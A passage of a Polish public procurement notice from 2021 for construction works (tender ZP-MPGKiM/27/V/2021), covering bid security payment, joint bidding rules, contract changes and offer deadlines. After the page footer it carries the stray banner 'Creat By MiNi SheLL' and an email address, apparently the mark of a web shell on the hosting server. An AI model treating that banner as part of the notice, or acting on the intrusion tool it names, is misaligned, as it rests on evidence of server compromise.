formach: • pieniądzu, • gwarancjach<br/>bankowych, • gwarancjach ubezpieczeniowych, • poręczeniach udzielanych przez podmioty, o<br/>których mowa a art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej<br/>Agencji Rozwoju Przedsiębiorczości (Dz. U. 2019r. , poz 310, 938, 1572).4. Ustala się<br/>następujące sposoby wniesienia wadium:a). przelew na rachunek bankowy Prowadzącego<br/>postępowanie (dotyczy pieniężnej formy wniesienia wadium) ING Bank Śląski 15 1050 1214<br/>1000 0010 0156 3541 dokonany skutecznie przed upływem terminu składania ofert5. Dokument<br/>stanowiący dowód poświadczenia o wniesieniu wadium powinien zawierać zapis:„Wadium w<br/>postępowaniu nr ZP-MPGKiM/27/V/2021 Realizacja Decyzji PINB – Etap I6. W przypadku<br/>składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>wadium może być wniesione przez dowolny podmiot (podmioty). Z dokumentu wadialnego lub<br/>innego dokumentu załączonego do oferty powinno wynikać, w imieniu jakiego Wykonawcy<br/>wadium jest wnoszone.7. Wadium wniesione w pieniądzu Prowadzący postępowanie<br/>przechowuje na rachunku bankowym.8. Okoliczności i zasady zwrotu wadium, jego przepadku<br/>oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa<br/>ustawa Prawo zamówień publicznych.9. Oferta Wykonawcy, który nie wniesie wadium lub<br/>wniesie w sposób nieprawidłowy zostanie odrzucona. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> cywilna) zobowiązani są do złożenia wraz ofertą pełnomocnictwa do ich reprezentowania w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Powyższe nie dotyczy sytuacji, w której<br/>upoważnienie/pełnomocnictwo do występowania w imieniu Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia wynika z dołączonej do oferty umowy regulującej współpracę<br/>Wykonawców bądź wszyscy wspólnicy podpiszą ofertę. Pełnomocnictwo składa się w oryginale,<br/>w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby udzielającej<br/>pełnomocnictwa lub w postaci elektronicznej kopii dokumentu, poświadczonej za zgodność z<br/>oryginałem przez notariusza, tj. opatrzona kwalifikowanym podpisem elektronicznym osoby<br/>posiadającej uprawnienia notariusza 2. Oferta musi być podpisana w taki sposób, by prawnie<br/>zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z<br/>Wykonawców lub pełnomocnika). 3. W przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, Oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy Pzp składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. 4. Dopuszcza się, aby wadium zostało<br/>wniesione przez pełnomocnika (lidera) lub jednego z Wykonawców wspólnie składających<br/>ofertę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień umowy mogą nastąpić za zgodą obu stron wyrażoną na piśmie w formie<br/>aneksu pod rygorem nieważności.2. Umowa może zostać zmieniona w przypadkach<br/>określonych w art. 454 oraz 456 ustawy Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal uzp</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-15 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-31 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com